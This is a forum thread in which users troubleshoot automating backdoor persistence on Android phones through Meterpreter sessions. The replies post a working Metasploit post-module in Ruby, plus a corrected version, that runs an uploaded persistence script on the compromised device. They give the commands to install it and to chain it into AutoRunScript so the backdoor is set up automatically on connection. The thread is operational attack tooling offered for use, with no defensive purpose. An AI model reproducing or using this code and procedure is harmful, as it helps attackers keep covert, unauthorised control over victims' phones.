I've been at this for days to no avail, I'm having issues with automating persistence within android on connection of a meterpreter session.
I've been playing around with the information at this link https://offensiveinfosec.wordpress.com/tag/autorunscript/, quite successfully I might add. however, the issue arises when I try to drop in to a shell and run commands on that shell within android.
The target is to upload a .sh file on connection, drop to a shell and then execute this command. The automation gets as far as "shell 1 process created" then ends. It's driving me up the wall.
Here is what I have written in my command file;
cd /
cd /sdcard/download
upload /root/Desktop/AndroidAutorun/Dn30.sh
shell
cd /
cd /sdcard/Download
sh Dn30.sh
As I mentioned, it executes flawlessly until shell, then nothing happens.
I'm relatively new to linux commands and am learning as I go along, please forgive me if its unbelievably obvious. Does anybody have any idea what I'm missing?
3 Responses
Have you resolved the issue? I'm facing the same problem
I think i might have a solution to the problem
i created a post android module
touch postmodule.rb
copy it to the metasploit source directory
cp postmodule /usr/share/metasploit-framework/modules/post/android/manage/
now paste this code into the postmodule.rb file in the metasploit folder
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
},
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',
}
))
end
def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/persistence.sh")
end
print_status("You now have a persistence backdoor")
end
end
notice in the code you need to name the file persistence.sh and upload to /sdcard before you run the post module
now when that is finish you:
backgroung the meterpreter session by running
background
run the post module by
use post/android/manage/postmodule.rb
set session <metasploit sessions>
to know your metasploit session type
sessions
finnally run the post module by typing
run
you could write the .rc file to automatically background the sessions and run the post module, i am suspecting that you already know this. I had this same problem and didnt know what to do then i wondered how does metasploit run post module. I checked out one of the post module script, having prior programming knowledge of python i was able to understand the ruby code, anyways what i understand is that in the common.rb file there is a class i cant remember but it has the cmd_exe method. Im not sure, but I think this method guess the kind of meterpreter sessions you have either android or windows and then i create a channel of some sort not sure maybe someone could explain. Anyways with this, you could run any non root comamand. this was very simple but the point is you just have to read and understand. I think i will do some forther researching to add rooted command. I think there is another file or class called :priv which will do this im not sure.
OH BTW i created this account with temp mail so i dont know if this post will last lol
Thanks bro... It is working..
I comments here with small modifications for other members simplicity
There is small syntax error on above script..
The revision version for postmodule. rb Is something like below...
class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
},
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',
}
))
end
def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/persistence.sh")
print_status("You now have a persistence backdoor")
end
end
You can call this without going to background..using metapreter..Like this
run post/android/manage/postmodule
If you add above line to AutoRunScript.. Everything works well in automatically.
i told this to new members and not for the original comment owner. He is a great friend.. He explained the solution clearly. I added additional things.
Share Your Thoughts